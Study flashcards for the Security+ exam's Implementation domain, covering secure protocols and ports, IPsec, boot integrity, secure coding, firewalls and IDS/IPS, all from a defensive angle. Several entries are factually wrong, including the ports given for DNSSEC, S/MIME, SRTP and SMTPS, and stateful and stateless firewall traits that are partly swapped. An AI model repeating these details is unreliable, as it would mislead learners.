Domain 3.0 Implementation

CASB (v2) Cloud Access Security Broker (CASB) is a software that sits between company & CSP and is designed to enforce security policies, monitor the traffic - if it is encrypted and does not contain anything malicious -, and ensures that everything is compliant with company's security policy
(DNSSEC) Domain Name System Security Extensions (DNSSEC) used to Secure DNS Traffic. Protects against poisoning of the DNS server and Cache. This is done by using Digital Signatues for the zone files. uses Both: TCP / UDP uses PORT: 55.
(SSH) Secure Shell or Secure Socket Shell (SSH) used for Secure Remote Access (Linux and Windows Network) uses Port: 22 Definition: a cryptographic network protocol for operating network services securely over an unsecured network. Its most notable applications are remote login and command-line execution. ---------------------------------------------- What is SSH used for? SSH provides a layer of security for information transfer between machines. Some important use cases for SSH are:Remote Access– SSH ensures encrypted remote connections for users and processes.File transfers – SFTP, a secure file transfer protocol managed by SSH, provides a safe way to manipulate files over a network.X11 Forwarding – Users can run server-hosted X applications from their client machines.PORT Forwarding– By mapping a client’s port to the server’s remote ports, SSH helps secure other network protocols, such as TCP/IP.Tunneling – This encapsulation technique provides secure data transfers. Tunneling is useful for accessing business-sensitive online materials from unsecured networks, as it can act as a handy VPN alternative.Network management – The SSH protocol manages network infrastructure and other parts of the system. Examples of SSH: - PuTTY (Client for Windows and LInux) - Open SSH (for Unix, Linux) - Tectia SSH (client & server for Windows, Unix and Linux) - WinSCP (For Windows) - ZOC
(S/MIME) Secure / Multipurpose Internet Mail Extensions (S/MIME) used to secure emails by Encrypting them and Digitally Signing them uses Port 993 (just like IMAPS)
(SRTP) Secure Real-time Transport Protocol (SRTP) used for Encryption, Message Authorization, & Integrity for Audio & Video over IP networks. uses Port: 5061 (shares Port overlap with SIP)
(LDAPS) Lightweight Directory Access Protocol over SSL used for Secure Directory Services Information. (ex: Active Directory Domain Services ) uses Port: 636
(HTTPS) Hypertext Transfer Protocol over SSL/TLS (HTTPS) used for Secure Web Browsing uses Port: 443
(SFTP) SSH File Transfer Protocol (SFTP) a completely separate protocol from FTP (it is NOT compliant with FTP servers) that uses SSH to encrypt File Transfers. used for Secure FTP downloads. uses Port 22
(FTPS) File Transfer Protocol, Secure (FTPS) used to Download Large Files securely. uses Ports 989 / 990.
(SNMP v3) Simple Network Management Protocol, version 3 (SNMP v3) used for Remote Monitoring and configuration of SNMP entities (such as Network Devices). uses Port: 161 / 162 & UDP.
Kerberos An authentication protocol used by Windows to provide two-way (mutual) authentication using a system of tickets - used to secure authentication. uses Port: 88
(IPsec) Internet Protocol Security (IPsec) used to Secure VPN sessions between 2 hosts. uses UDP uses Port: 500.
(SMTPS) Secure Simple Mail Transfer Protocol (SMTPS) used to Secure SMTP for Email using the Transport Layer Security (TLS). Intended to provide Authentication of communication partners. - this is NOT a proprietary protocol nor an Extension of SMTP. SMTPS uses TLS for email to provide a secure connection. SMTP does not and is susceptible to attacks. uses Port 587
(POP 3S) Post Office Protocol Secure (POP 3S) is the ENCRYPTED Version of POP3 it is an Application-layer Internet standard protocol used by e-mail clients to retrieve e-mail from a mail server POP version 3 (POP3S) is the version in common use. used to Secure Email. uses Port 995 (when Encrypted) ------------------------ POP moves the message from the email server to the local computer, although there is usually an option in email clients to leave the messages on the email server as well. IMAP defaults to leaving the message on the email server, simply downloading a local copy. POP treats the mailbox as a single store, and has no concept of folders, unlike IMAP.
(IMAPS) IMAP over SSL/TLS or IMAP Secure --(IMAPS) The Internet Message Access Protocol is an Application layer Internet protocol that allows an e-mail client to access email on a remote mail server. Current version is IMAP 4. uses Port 993
(SIP) Session Initiated Protocol (SIP) used for signaling and controlling the Internet Telephony for Voice , Video and messaging applications. SIP is used in Internet telephony, in private IP telephone systems, as well as mobile phone calling over LTE (VoLTE). Port: 5060 / 5061 (shares Port commonality with SRTP)
IPSec Protocols Authentication header (AH) Protocol AH Protocol provides a Mechanism for Authentication Only. It does NOT perform Encryption. Due to no encryption, this makes it FASTER than ESP. Encapsulating Security Payloads (ESP) Protocol: provides data confidentiality (encryption) and authentication (data integrity, data origin authentication, and replay protection). ESP can be used with confidentiality only, authentication only, or both confidentiality and authentication.
IPsec Modes "1. Tunnel: Two IP headers are sent. The inner IP packet determines the IPsec policy that protects its contents. It is good for VPNs, and gateway-to-gateway security. useful for protecting traffic between different networks. An additional advantage of this mode is that it makes it very easy to establish a “tunnel""‚ between 2 secure IPsec gateways Tunnel mode protects internal routing information by encrypting the original packet’s IP header by creating a new IP header on top of it. This allows tunnel mode to protect against traffic analysis, since attackers can only determine the tunnel endpoints. Tunnel mode is mandatory when one of the peers is a security gateway applying IPsec on behalf of another host. In other words, it’s more compatible with existing gateways than transport mode. Tunnel mode makes it easier to traverse NATs. Both VPN clients and VPN gateways can use IPsec tunnel mode. Despite its advantages, tunnel mode has a greater overhead and smaller MTU than transport mode. 2.Transport: the IP addresses in the Outer header are used to determine the IPsec policy that will be applied to the packet. (It is good for ESP host-to-host traffic) commonly used when fast and secure end-to-end communications are required, such as client-server communications (workstation-to-gateway and host-to-host scenarios). Reasons to use transport mode include: Transport mode provides end-to-end security (authentication, integrity, and anti-replay protection). Transport mode has a larger MTU than tunnel mode. Transport mode has a lower overhead than tunnel mode. Transport mode is not without its flaws. It has poor compatibility with security gateways, as well as greater difficulty in implementing traversal NATs. For this reason, transport mode can’t be used in protected gateway-to-gateway configurations."
"Tunnel: two IP headers are sent. The inner IP packet determines the IPsec policy that protects its contents. It is good for VPNs, and gateway-to-gateway security. the entire original IP packet is encapsulated to become the ""payload"" of a new IP packet. Additionally, a new IP header is added on top of the original IP packet. " Part of the IPsec Mode
Transport: the IP addresses in the outer header are used to determine the IPsec policy that will be applied to the packet. (It is good for ESP host-to-host traffic) an IPsec Mode
Authentication header (AH) Protocol: provides a Mechanism for Authentication Only. It does NOT perform Encryption. Due to no encryption, this makes it FASTER than ESP. an IPsec Protocol
Encapsulating Security Payloads (ESP) Protocol: provides data confidentiality (encryption) and authentication (data integrity, data origin authentication, and replay protection).Can be used with confidentiality only, authentication only, or both confidentiality and authentication. an IPsec Protocol
Securing Voice and video SRTP (Secure Real Time Transport Protocol or Secure RTP) is how to secure VOIP protocols. SRTP uses AES Encryption. For just VIDEO, you could use SSL . you could also use HTTP if using voice and video on a website SIP is also used.
What is being used for Time synchronization ? uses NTP (Network Time Protocol) which is used to synchronize the Clock across the network. use NTPsec - secure network time protocl - Began Development in June 2015 - Cleaned up the Code Base to remove Vulnerabilities.
What protocols should be used for Email and web use S /MIME use secure SMTP / IMAP or POP3 over SSL if email on Web Browser, always use SSL / TLS (Transport Layer System) TLS is the newer version of SSL. TLS is Commonly used . - use HTTPS (which is HTTP over TLS / HTTP over SSL) - This uses Public Key Encryption A) Private Key on the Server B) Symmetric Session key is transferred using Asymmetric Encryption C) Security and SPEED
How to securely perform File Transfer? - use FTPS (File Transfer Protocol Secure over SSL aka FTP -SSL) this uses File Transfer Protocol secure. This is unique b/c it uses SSL. This is NOT SFTP. or use SFTP - uses SSH for File Transfer Protocl (does not use SSL like FTPS) - Provides File System Functionality - it can also Resume Interrupted Transfers, get Directory Listings on a device, allows you Remote File Removal
Directory services Use LDAP (Lightweight Directory Access Protocol), but more preferably LDAPS (LDAP secure over SSL). - Protocol for Reading and Writing directories over an IP Network (provides an Organized set of Records, like a Phone Directory) - Written using X.500 Specification / standard. This was written by the ITU (International Telecommunications Union and they know Directories!!) - If you're using Microsoft Active Directory, Apples Open Directory or Open LDAP then you're using a Directory that can be accessed using this Standardized version Other methods of security on LDAP: - SASL (Simple Authentication and Security Layer) provides authentication using many different methods (ex: Kerberos or Client Certificate)
What can be used for secure Remote Access? 1. use SSH (Secure Socket Shell) - Encrypted terminal communication - Replaces Telnet (& FTP) - Provides Secure terminal communication and File Transfer Features 2. use IPsec - Security for OSI Layer 3 -Authentication and Encryption for Every Packet - provides Confidentialtiy and Integrity (Encryption and Packet signing) - has been Standardized (common to sue) - has 2 core IPsec Protocols: Authentication Header & Encapsulation Security Payload (ESP)
How to secure Domain Name Resolution Use DNSSEC (Domain Name System Security Extensions) -DNS has NO security in the Original Design. So it's Relatively easy to Poison DNSSEC VALIDATES the DNS responses - Provides Origin of Authentication - Provides Data Integrity - Provides Public Key Cryptography -- DNS records are Signed and Published in DNS
What protocol can be used for Routing and switching use SNMP v 3 (Simple Network Management Protocol Version 3)-- gathers and collects router and switching info on your network. - Provides Confidentialiity for Encrypted Data - Integrity -- no tampering of Data - Authentication - use version 3 -- b/c it provides Encryption in version 3. you can also use SSH (Secure Shell) to provide Encrypted Terminal Communication you can also use HTTPS - becoming very common to configure Router protocols on a Website - Encrypted Communication is provided by HTTPS vs HTTP
What can we use for secure Network Address Allocation? suggested you use -- NAT (Network Address Translation) also secure DHCP DHCP: Port 67 / 68 (UDP) To Enhance DHCP security, we've added additional security protocols OUTSIDE of DHCP - for example, in Active Directory (AD) , DHCP servers must now be Authorized. - Many switches can be configured to use Trusted Certificates - If DHCP sees DHCP being sent from an Untrusted Interface, it can BLOCK that communication. (called DHCP Snooping in Cisco Routers/Switches) DHCP client DoS -- starvation attack -an Attacker changes / spoofs their MAC Address to Exhaust the DHCP server/ pool of IP addresses, so no more IP addresses can be routed to other devices. - so in response, Switches can be configured to LIMIT the amount of MAC addresses per interface, to prevent a DHCP Dos Attack
Subscription Services - Automated Subscriptions such as with Antivirus / Antimalware software may require continuous updates. - Constant updates -- each subscription uses a different update method and communicates with different IP's - This may require we examine each device individually to understand which Protocol it uses so we can configure Firewalls to ONLY allow updates from Well Known and Specific Servers.
Antivirus is a software program designed to detect and destroy viruses and other malicious software from the system.
Anti-malware a program that protects the system from all kinds of malware including viruses, Trojans, worms, and potentially unwanted programs.
(EDR) Endpoint Detection & Response (EDR) an Integrated Endpoint Security Solution that continously monitors the endpoint to mitigate malicious cyber threats
DLP (Data Loss Prevention) is a way to protect sensitive information and prevent its inadvertent disclosure. Can identify, monitor, and automatically protect sensitive information in documents. Protects personally identifiableinformation (PII), protected health information (PHI) and more ( policies can be typically applied to email, SharePoint,cloud storage, and in some cases, even databases )
(NGFW) Next-generation firewall (NGFW) (Hardware or Software) that combines Coventional Firewalls, Deep-packet inspection (DPI), (IPS), and Application Level firewall that moves beyond Port / Protocol inspection and blocking. Also Adds application-level inspection, intrusion prevention, and brings intelligence from outside the firewall. NGFW's Goal is to try to include more layers of the OSI model in its monitoring
(HIPS) Host-based intrusion prevention system (HIPS) analyzes whole packets, both header and payload, looking for known events. When a known event is detected, the packet is rejected. IDS (Intrusions Detection System) /IPS (Intrustion Prevention System) in Software form, installed on a host (often a server) .
(HIDS) Host-based intrusion detection system (HIDS) analyzes whole packets, both header and payload, looking for known events. When a known event is detected, a log message is generated. - IDS/IPS in Software form, installed on a host (often a server)
Host-based Firewall an Application firewall that is built-into desktop Operating Systems, like Windows or Linux. Because it is an application, it is more vulnerable to attack in some respects (versus hardware FireWall). Restricting service/process access to ensure malicious parties cannot stop/kill is important. (Host-based and Network-based Firewalls are often used Together in a LAYERED Defense)
Boot Integrity ensures host are protected during the boot process, so all protections are in place when system is fully operational - Attacks on our OS are constant. The BOOT process is the perfect Infection Point. Note: Rootkits can work at the Kernel Level to infect and take over OS, giving it the same rights as the OS. - so Protecting the Boot is Important! Secure Boot, Trusted Boot, and Measures Boot are all different parts of the BOOT process and are a considered a Chain of Trust!
Boot security / Unified Extensible Firmware Interface (UEFI) a Modern version of the Basic Input/Output System (BIOS) that is more secure and is needed for a secure boot of the OS (The older BIOS cannot provide secure boot)
Measured boot Where all components from the firmware,applications, and software are measured and information stored in a log file. The log file is on the Trusted Platform Module (TPM) chip on the motherboard. ------------ ---------------- Microsoft Definition: The Measured Boot feature provides antimalware software with a trusted (resistant to spoofing and tampering) log of all boot components. Antimalware software can use the log to determine whether components that ran before it are trustworthy versus infected with malware. It can also send the Measured Boot logs to a remote server for evaluation. The remote server can start remediation actions by interacting with software on the client or through out-of-band mechanisms, as appropriate.
Boot Attestation Attestation is accomplished when a device shows proof of its software integrity / configuration state using its boot configuration log (TCGLog). Forgery of a boot log is difficult Why use this? Once malicious software / malware / rootkits infect a computer, they can eventually operate at the kernel level, thus it effectively has full control of the operating system. This is why protecting every part of the boot process becomes so important. This ensures that the Operating System kernel has not been modified by any malware or rootkit, and if there has been any change, the boot process will stop. The kernel of the operating system will then verify other parts of the OS, such as boot drivers and start up files, and make sure that those components remain safe. It’s important to secure the boot process to prevent the installation of malicious software
TPM (for extra credit) At its most basic, the TPM is a tiny chip on your computer’s motherboard, sometimes separate from the main CPU and memory Microsoft Definition: A Trusted Platform Module (TPM) is a microchip designed to provide basic security-related functions, primarily involving encryption keys. Considered tamper-proof, cryptographically secure auditing component with firmware supplied by a trusted third party. TPM communicates with the rest of the system by using a hardware bus. The boot configuration log contains hash-chained measurements recorded in its Platform Configuration Registers (PCR) when the host last underwent the bootstrapping sequence.
UEFI vs BIOS (legacy) -- What's the difference? UEFI, created in 2006 -- is the newer replacement of BIOS legacy. UEFI supports Hard drives sizes up to 9 ZettBytes (1 Zettabyte = one billion Terabytes) BIOS only supports hardrives up to 2.2 Terrabytes. UEFI provides Faster Boot Time and discrete Driver Support BIOS only has drive support stored in it's ROM. UEFI provides more Security! UEFI runs in 32 bit or 64 bit mode / BIOS only runs in 16 bit mode.
Tokenization (review) is deemed more secure than encryption because it cannot be reversed - Takes sensitive data, such as a credit card number, and replaces it with random data. For example, many payment gateway providers store the credit card details securely and generate a random token. ----- Tokenization can help companies meet PCI DSS, HIPAA compliance requirements
Hashing (Review) A database may contain a massive amount of data, and hashing is used to index and fetch items from a database. -This makes the search faster as the hash key is shorter than the data. - The hash function maps data to where the actual records are held.
Salting (Review) Salting passwords in a database Adds random text before hashing to delay / increase the compute time for a Brute-Force attack. Also Renders rainbow tables ineffective
Input validations Ensures buffer overflow, integer overflow, and SQL injection attacks cannot be launched against applications and databases. - Use where data is entered either using a web page or wizard. - Only accept data in the correct format within a range of minimum and maximum values. -- Note: Incorrect formats should be rejected, forcing user to re-enter
Secure cookies Cookies are small packets of data that are stored in your Web browser and contain information about your session. Cookies generally use HTTP (aka HTTP Cookie) These Can be stolen by Attackers to carry out a session hijacking attack. Setting the Secure Attribute flag in Website code to ensure that cookies are only downloaded when there is a secure HTTPS session.
What is the function of (HTTP) Headers Hypertext Transfer Protocol (HTTP) Headers HTTP headers are designed to transfer information between the Host and the Web server. an attacker can carry out cross-site scripting (XSS) as it is mainly delivered through injecting HTTP response headers. This can be prevented by entering the HTTP Strict Transport Security (HSTS) header: HSTS ensures that the browser will ignore all HTTP connections
Code Signing uses a Certificate to Digitally Sign Scripts and Executables to verify their Authenticity and to confirm that they are Genuine
Allow List An allow list enable only explicitly allowed applications to run. This can be done by setting up an application whitelist. **Firewalls, IDS/IPS, and EDR systems have an allow list**
Block List / Deny List prevents specified applications from being installed or run by using a block/deny list in the specified security solution. **Firewalls, IDS/IPS, and EDR systems can have a block list.
Secure Coding Practices The Developer who creates software writes code in a manner that ensures that there are no bugs or flaws. Intent is to prevent attacks such as buffer overflow or integer injection.
Static code analysis Analysis where the code is not executed locally but is analyzed by a static code Analyzer tool. Source code is run inside the tool that reports any flaws or weaknesses. -Requires source code access
Dynamic Code Analysis code is executed, and a technique called fuzzing is used to inject random input into the application. Output is reviewed to ensure appropriate handling of unexpected input. Exposes flaws in an application before it is rolled out to production. Does not require source code access
Manual code review code is reviewed line by line to ensure that the code is well-written and error free. Tends to be tedious and time-consuming.
Fuzzing "technique used to ""test"" Applications -- where Random information is inputted into an Application to see if the application crashes or memory leaks result, or if error information is returned. used to remedy any potential problems within application code before a new application is released. (White Box Testing Scenario) can also be used to find any vulnerabilities with the application after release. This is called improper input validation. (Blackbox testing Scenario)"
Static Application Security Testing "analysis of computer software performed without actually executing programs. tester has access to the underlying framework, design, and implementation Tests ""Inside to Out"" - Requires Source Code"
Dynamic Application Security Testing "a program which communicates with a Web Application (Executes the application). Tester has NO knowledge of the technologies or frameworks that the application is built on - Tests ""OUTSIDE IN"" - No Source Code Required"
Open ports and services listening ports should be restricted to those necessary, filtered to restrict traffic, and disabled entirely if unneeded. (Block through firewalls, disable by disabling underlying service.)
Registry access should be restricted, and updates controlled through policy where possible.always take a backup of the registry before you start making changes
Disk encryption drive encryption can prevent unwanted access to data in a variety of circumstances (Using FDE or SED)
OS (Operating System) Hardening OS hardening can often be implemented through Security baselines such as: Updates/ Service Packs, User Accounts, Network Access & Security (Limit Network Access) AntiVirus AntiMalware etv Can be applied through group policies or management tools (like MDM)
Patch Management "aka as ""update management"" ensures that systems are kept up-to-date with current patches. will evaluate, test, approve, and deploy patches. System audits verify the deployment of approved patches to system. Patchboth native OS and 3rdparty apps Applyout-of-band updates promptly. Organazations without patch management will experience outages from known issues that could have been prevented - Third-party updates: such as Application, developers, Device Drivers - Auto-update -- Not always the Best Option, may create problems with OS or applications on that systems. - Emergency Out-Of-Band Updates: due to Zero Day and Important security concerns."
FDE Full Disk Encryption (FDE) is built into the Windows Operating System. Bitlocker & FileVault is an implementation of FDE. - Keys are stored on the TPM
SED Self-Encryption Device encryption is encryption that’s built into the hardware of the drive itself. anything that’s written to that drive is automatically stored in encrypted form. - Hardware Based Full Disk Encryptoin - No OS software needed - A good SED should follow the Opal Storage Specification -- the Standard for SED storage.
Hardware Root of Trust - It verifies that the keys match before the secure boot process takes place When certificates are used in FDE, they use a hardware root of trust for key storage. - TPM is often used as the basis for a hardware root of trust. Cryptographic keys are burned into the TPM. It protects against all types of attacks: Brute-Force Attack, malware, etc. Checks for Rootkits.
Sandboxing application is installed in a Virtual Machine environment isolated from our network. - Enables patch, test, and ensure that it is secure before putting it into a production environment. Also facilitates investigating dangerous malware. -In a Linux environment, this is known as “chroot Jail“. other -- in Sandboxing -- Applications can NOT Access unrelated resources. They play in their own sandbox. This is commonly used durin Development phase. Also used in Different Deployments such as: - Virtual Machines - Mobile Devices - Browser iframes (inline frames) - Windows User Account Control (UAC)
Trusted Platform Module (TPM) a chip that resides on the motherboard of the device. it is Multi-purpose, like storage and management of keys used for full disk encryption (FDE) solutions. Provides the operating system with access to keys, but prevents drive removal and data access - Burned Im Cryptography - Protects against Brute Forve attack
Jump servers a remote admin workstation, typically placed on a Screen Subnet, aka Permieter network (DMZ) that allows Admins to connect Remotely to the Network to perform admin activites.
Forward Proxy (part of Proxy Servers) server that controls Outband requests from the users that seek resources on the External Network
Reverse Proxy (part of Proxy Servers) placed on a Screen Subnet and performs the Authentication and Decryption of a Secure Session to Enable it to Filter the incoming traffic.
(NIDS) Network-based intrusion detection system (NIDS) analyzes whole packets, both header and payload, looking for a known events. When a known event is detected, a log message is generated (and optionally an email notification can be generated) (an IDS / IPS at the Network Level, often in Hardware form)
Network-based intrusion prevention system (NIPS) analyzes whole packets, including both header and payload, looking for known events. When a known event is detected, the packet is rejected Note: The difference with IPS is that it TAKES ACTION, where IDS just logs the data.
What is the difference between an IDS vs IPS system? While both works at the Network Level; an IPS system will TAKES ACTION by rejecting the Packet, where IDS just logs the the threat and notifies you.
Types of IDS (Intrusion Detection Systems) to know: A) Heurisitc / Behavior: B) Anomaly: Definition (for Both) Creates a Baseline of activity to Identify Normal Behavior and then measure system performance Against the Baseline to Detect Abnormal Behavior
Heurisitc (IDS & IPS) Heuristic: A Types of IDS (Intrusion Detection Systems) or IPS that uses AI to identify attacks that have no prior signature. - can detect previously UNKNOWN attack methods. - Can Detect Emerging Threats that haven't yet been defined or have NO Signature.
Anomaly (IDS & IPS) A Types of IDS (Intrusion Detection Systems) that creates a Baseline of activity to Identify Normal Behavior and then measure system performance Against the Baseline to Detect Abnormal Behavior - can detect previously UNKNOWN attack methods. - Can Detect Emerging Threats that haven't yet been defined in a Signature.
Signature-Based (IDS & IPS) "aka ""Knowledge-Based"" looks for a specific traffic flow pattern, and once that traffic matches the signature the traffic can be blocked. uses Signatures similar to the signature definition you'd see in Anti-Malware / Antivirus software. - are Only effective against KNOWN Attack-methods for which a Signature is available."
Inline vs Passive NIDS/NIPS (used for Modes of Operations) Inline (aka In-Band) - the NIDS / NIPS is placed on or near the Firewall as an Additional Layer of Security. Passive mode (aka Out of Band) -- Traffic does NOT go through the devices NID /NIPS. There are Sensors & Collectors that forward alerts to the NIDS.
Inline (aka In-Band) the NIDS / NIPS is placed on or near the Firewall as an Additional Layer of Security.
Passive mode (Out of Band) (aka Out of Band) -- Traffic does NOT go through the devices NID /NIPS. There are Sensors & Collectors that forward alerts to the NIDS.
Sensors & Collectors can be placed on a Network to Alert NIDS of ANY changes in Traffic Patterns on the Network. If you place a Sensor on the Internet Side of the Network -- it can potentially scan all of the Traffic from the Internet side -- which is valuable in detecting Anamolous behavior
Hardware Security Module (HSM) a physical computing device that safeguards and manages Digital Keys. it performs Encryption & Decryption functions for Digital Signatures, Strong Authentication, and other Cryptographic Functions. - Like a TPM, but are Often Removable or a type of External device-- where as TPM is a chip on a Motherboard.
Types of Firewalls (to be reviewed in Depth in the next flash flash cards) - Web application Firewall (WAF) - NGFW (Next Generation Firewall) - Stateful - Stateless - Unified threat management (UTM) - Network address translation (NAT) gateway - Content/URL filter - Open-source vs. proprietary - Hardware vs. software - Appliance vs. host-based vs. virtual
(WAF) Web application Firewall (WAF) protecting web applications by Filtering and monitoring HTTP traffic between a web application and the Internet. Typically protects web applications from common attacks like XSS, CSRF, and SQL injection - Some come pre-configured with OWASP rule sets
Next Generation FireWalls (NGFW) aka NGFW a “deep-packet inspection” firewall that moves beyond port/protocol inspection and blocking.adds application-level inspection, intrusion prevention, and brings intelligence from outside the firewall.
Deep Packet Inspection packet inspection inspects and filters both the header and payload of a packet that is transmitted through an inspection point - can detect Protocol Non-Compliance, Spam, Viruses, intrusions
(UTM) Unified Threat Management Unified Threat Management (UTM) a multifunction device (MFD) composed of several security features in addition to a Firewall; may include IDS, IPS, a TLS/SSL proxy, web filtering, QoS management, bandwidth throttling, NAT, VPN anchoring, and antivirus. - more commonly found in Small & Medium businesses (SMB) - Can be Hardware or Software
Stateful (Firewall) "type of Firewall that Filters & Monitors Network traffic, checking Packets against a State-Table to determine if it belongs to an established connectiom. If it doesn't, it restricts or block packets The State Tables stores Details about each connection based on: Source and Destination IP addresses, Port Numbers or other static values. Relevant Information. Primary Advantage is it's ability to understand the Context of Each Network =============== Not 'aware' of traffic patterns or data flows. - Almost every single Firewall is considered a ""Stateful "" Firewall. We really don't have a ""Stateless"" Firewall. - Operates on Layer 3 & 4 of OSI model - Stateful have a ""state table"" that keeps track of ALL Traffic going out and coming back in.  Enforces the TCP handshake.   Stateless firewalls can't do this.  - are Typically, faster and perform better under heavier traffic loads. "
Stateless a Type of Firewall that Filters Network Traffic based on Individual Packets WITHOUT Storing them. Does NOT use a State-table Can watch traffic streams from end to end. Examines Packets based on: Source & Destination IP address Port Numbers Protocols ==================== Are aware of communication paths and can implement various IP security functions such as tunnels and encryption. Better at identifying UNAUTHORIZED and Forged communications. 
(NAT) Gateway Network Address Translation (NAT) Gateway Gaeway that allows private subnets for communication with public cloud services and the Internet, but automatically hides the internal network from the Internet users it does this by Translating the private IP address into a single Public IP address The NAT gateway has the Network Access Control List (NACL) for the private subnets.
Content / URL Filter Filter that looks at the traffic of the requested webpage and block the content based on the implemented filters Used to block inappropriate content in the context of the situation.
Open-source vs. proprietary Firewalls Open Source: one in which the vendor makes the license freely available and allows access to the source code, though it might ask for an optional donation. There is no vendor support with open source, so you might pay a third party to support in a production environment (One of the more popular open-source firewalls is pfsense, the details for which can be found at https://www.pfsense.org/. ) Proprietary Firewall: are more expensive but tend to provide more/better protection and more functionality and support (at a cost).many vendors in this space, including Cisco, Checkpoint, Pal Alto, Barracuda. - but “no source code access”
Open Source Firewall one in which the vendor makes the license freely available and allows access to the source code, though it might ask for an optional donation. There is no vendor support with open source, so you might pay a third party to support in a production environment (One of the more popular open-source firewalls is pfsense, the details for which can be found at https://www.pfsense.org/. )
Proprietary Firewalls are more expensive but tend to provide more/better protection and more functionality and support (at a cost).many vendors in this space, including Cisco, Checkpoint, Pal Alto, Barracuda. - but “no source code access”
Hardware vs. Software Firewalls Hardware Firewalls: A piece of purpose-built network hardware. May offer more configurable support for LAN and WAN connections. Often has Superior Throughput vs Software because it is hardware designed for the speeds and connections common to an enterprise network Software Firewalls: Software based firewalls that you might install on your own hardware. Provide flexibility to place firewalls anywhere you’d like in your organization. On servers and workstations, you can run a host-based firewall. Host-based (software) are more vulnerable in some respects as discussed earlie Note: Host-based (Software) Firewalls are more vulnerable in some respects as discussed earlier
Hardware Firewalls A piece of purpose-built network hardware. May offer more configurable support for LAN and WAN connections. Often has Superior Throughput vs Software because it is hardware designed for the speeds and connections common to an enterprise network
Software Firewalls Software based firewalls that you might install on your own hardware. Provide flexibility to place firewalls anywhere you’d like in your organization. On servers and workstations, you can run a host-based firewall. Host-based (software) are more vulnerable in some respects as discussed earlie Note: Host-based (Software) Firewalls are more vulnerable in some respects as discussed earlier
Appliance vs. host-based vs. Virtual Firewalls Appliance / Application Firewall: usually refers to Hardware (appliance) Firewall. typically catered specifically to application communications; Often that is HTTP or Web traffic. an example is called a next generation firewall (NGFW) Host-Based: aka Software / An application installed on a host OS, such as Windows or Linux, both client and server operating systems Virtual: In the cloud, firewalls are implemented as virtual network appliances (VNA). Available from both the CSP directly and third-party partners (commercial firewall vendors)
Appliance Firewall Appliance Firewall / Application Firewall: usually refers to Hardware (appliance) Firewall. typically catered specifically to application communications; Often that is HTTP or Web traffic. an example is called a next generation firewall (NGFW)
Host-Based Firewall aka Software / An application installed on a host OS, such as Windows or Linux, both client and server operating systems
Virtual Firewall In the cloud, firewalls are implemented as virtual network appliances (VNA). Available from both the CSP directly and third-party partners (commercial firewall vendors)
(ACL) Access control list (ACL) a configuration built in (to routers or firewalls) that is used to Allow or Deny traffic.Configure an access control list on the ingress (inbound traffic) or egress (outbound traffic) of an interface -Found on Routers / Firewalls / Folders
Types of Network Devices Firewalls Firewalls are essential tools in managing and controlling network traffic. A firewall is a network device used to filter traffic. (Varies by type, but may filter at layers 3 through 7) Switch repeats traffic only out of the port on which the destination is known to exist. Switches offer greater efficiency for traffic delivery, create separate collision domains, and improve the overall throughput of data. (usually performs on layer 2, sometimes layer 3) Routers used to control traffic flow on networks and are often used to connect similar networks and control traffic flow between the two. They can function using statically defined routing tables, or they can employ a dynamic routing system. (layer 3) Gateways a gateway connects networks that are using different network protocols. Also known as protocol translators, can be stand-alone hardware devices or a software service. (network gateways work at layer 3.)
Firewalls (Network Device) Firewalls are essential tools in managing and controlling network traffic. A firewall is a network device used to filter traffic. (Varies by type, but may filter at layers 3 through 7)
Switch (Network Device) device that Repeats Network Traffic Only out of the Port on which the Destination is known to exist. Switches offer greater efficiency for traffic delivery, create separate collision domains, and improve the overall throughput of data. (usually performs on layer 2, sometimes layer 3)
Routers used to control traffic flow on networks and are often used to connect similar networks and control traffic flow between the two. They can function using statically defined routing tables, or they can employ a dynamic routing system. (use layer 3)
Gateways (Network Devices) a Gateway connects networks that are using different network protocols. Also known as protocol translators, can be stand-alone hardware devices or a software service. (Network Gateways Work At Layer 3.)
(QoS) Quality of Service (QoS) Ensures that applications have the bandwidth they need to operate. This is done by Prioritizing traffic based on importance and function. Traffic of real-time functions (like voice and video streaming) might be given greater priority. Priorities are human-configurable - this will be on the TEST, but will be asked in association with VOIP (Voice Over IP). - If asked about Voice and Data and which you prioritize for QoS for a VOIP system: - Prioritize the Voice Traffic coming into your Network over the network devices - QoS would be used to prioritize the particular bandwidth.
Implications of IPv6 Network security focus changes somewhat with IPv6 1. There are much more IPv6 addresses than IPv4. - This leads to difficulties with scanning of so many ports - Because there are so many IP addresses available with IPv6, there is less need to perform port address translation (PAT) or outbound network address translation (NAT) on the network. This can simplify the communications process, but... 2. Network address translation (NAT) is itself a Security feature, as it removes direct access to source (user) in some use cases (like Internet browsing). With IPv6 we removed the Address Resolution Protocol or ARP which brings us to elimination of ARP Poisoning This Does not imply IPv6 is any more or less secure than IPv4 - attack vectors changes.
Port spanning / Port mirroring Port mirroring (also known as port spanning) sends a copy of all data that arrives at a Port to another device / computer or sensor for investigation later or in near real-time
Port Taps passive component that allows non-intrusive access to data flowing across the network and enables monitoring of network links. A network tap uses passive optical splitting to transmit inline traffic to an attached monitoring device without data stream interference. The network tap has (at least) three ports: an A port, a B port, and a monitor port. A tap inserted between A and B passes all traffic (send and receive data streams) through unimpeded in real time, but also copies that same data to its monitor port, enabling a third party to listen. Network taps are commonly used for Network Intrusion Detection Systems (NIDS), VOIP recording, Network probing etc and other monitoring and collection devices and software that require access to a network segment
Monitoring services To help provide additional security on the network, some organizations employ a monitoring service -a group that monitors network security/activity. (Common with SIEM and SOAR functions (covered in 1.7)) Often an outsourced security operations center (SOC) function to provide 24x7 monitoring and alert or remediate issues after business hours. May also be helpful in maintaining compliance (HIPAA, GDPR, PCI DSS).
File integrity monitors Monitors and detects changes to files that should not be modified, automating notification (and potentially remediation). Commonly monitors files that would never change: things like your OS (operating system) files, where changes indicate some type of malicious activity! - can also be used to detect unwanted changes to baseline configurations
Route Security is basically routing security -- if you're routing information across a network you want ENCRYPTION (ex IPSEC & SSL/TLS)
Broadcast Storm "A Broadcast Storm (aka broadcast radiation) is the accumulation of broadcast and multicast traffic on a computer network. Extreme amounts of broadcast traffic constitute a ""broadcast storm"". It can consume sufficient network resources so as to render the network unable to transport normal traffic. This crashes the network. A packet that induces such a storm is occasionally nicknamed a Chernobyl packet"
Broadcast Storm Prevention (part of Port Security) to prevent Broadcast Storms: - The Switch can control Broadcasts -- the software on the switch allows us to LIMIT the number of broadcasts per second. - Can also be used to Control Multicast and unknown Unicast traffic (Tight Security Posture) - Can also be Managed by Specific Values or by Percentage (or change over Normal Traffic Patterns)
